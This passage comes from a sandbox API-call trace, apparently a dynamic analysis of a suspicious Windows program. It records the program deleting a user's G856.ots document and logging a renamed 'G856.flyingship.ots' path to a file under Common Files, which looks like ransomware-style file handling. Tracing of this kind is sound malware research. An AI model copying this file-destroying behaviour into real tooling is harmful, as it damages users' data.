wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.936] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.936] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.936] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0177.936] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.936] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.936] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0177.938] FreeLibrary (hLibModule=0x75990000) returned 1 [0177.938] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.938] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.938] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots", lpFilePart=0x0) returned 0x40 [0177.939] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f0f0f0, ftCreationTime.dwHighDateTime=0x1d5e547, ftLastAccessTime.dwLowDateTime=0x24d4fc30, ftLastAccessTime.dwHighDateTime=0x1d5dd39, ftLastWriteTime.dwLowDateTime=0xf628660, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x2691, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="G856.ots", cAlternateFileName="")) returned 0x90af58 [0177.939] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\g856.ots")) returned 1 [0177.946] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f0f0f0, ftCreationTime.dwHighDateTime=0x1d5e547, ftLastAccessTime.dwLowDateTime=0x24d4fc30, ftLastAccessTime.dwHighDateTime=0x1d5dd39, ftLastWriteTime.dwLowDateTime=0xf628660, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x2691, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="G856.ots", cAlternateFileName="")) returned 0 [0177.946] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0177.947] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0177.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ots", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ots", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0177.948] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0177.948] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.948] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0177.948] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.948] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0177.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0177.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0177.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0177.949] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0177.949] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x17a1, lpOverlapped=0x0) returned 1 [0177.949] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0177.949] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x17a1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.949] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0177.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0177.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0177.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0177.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0177.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.flyingship.ots\r\n", cchWideChar=78, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 78 [0177.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4e) returned 0x923a78 [0177.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.flyingship.ots\r\n", cchWideChar=78, lpMultiByteStr=0x923a78, cbMultiByte=78, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.flyingship.ots\r\n", lpUsedDefaultChar=0x0) returned 78 [0177.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0177.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0177.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0177.950] WriteFile (in: hFile=0x120, lpBuffer=0x923b28*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923b28*, lpNumberOfBytesWritten=0x87f43c*=0x4d, lpOverlapped=0x0) returned 1 [0177.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0177.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0177.950] CloseHandle (hObject=0x120) returned 1 [0177.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0177.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0177.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0177.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0177.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0177.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0177.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0177.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0177.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0177.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0177.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0177.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0177.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0177.952] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0177.953] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0177.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0177.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0177.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0177.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0177.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0177.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0177.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0177.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0177.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0177.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0177.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0177.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0177.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0177.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0177.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0177.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0177.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0177.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0177.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0177.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0177.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0177.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0177.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0177.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0177.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0177.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0177.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0177.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0177.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0177.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0177.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0177.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0177.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0177.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0177.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0177.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0177.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0177.954] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0177.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0177.954] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0177.954] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0177.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0177.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0177.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0177.954] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0177.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0177.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0177.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0177.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1980 [0177.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0177.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0177.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0177.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0177.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0177.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0177.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0177.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0d8 [0177.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0177.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0177.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0177.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0177.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0177.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0177.955] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0177.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0177.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0177.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0177.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0177.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0177.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0177.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0177.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0177.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0177.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0177.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0177.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0177.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0177.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0177.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0177.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0177.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0177.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0177.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0177.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0177.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0177.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0177.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0177.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0177.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0177.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0177.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0177.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0177.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0177.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0177.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0177.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0177.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0177.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0177.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0177.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0177.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0177.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0177.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0177.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0177.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0177.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0177.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0177.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0177.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0177.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0177.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0177.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0177.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0177.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0177.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0177.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0177.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0177.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0177.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0177.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0177.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0177.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0177.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0177.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0177.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0177.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0177.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0177.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0177.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0177.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0177.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0177.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0177.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0177.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0177.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0177.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0177.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0177.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0177.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0177.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0177.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0177.958] HeapFree (in: 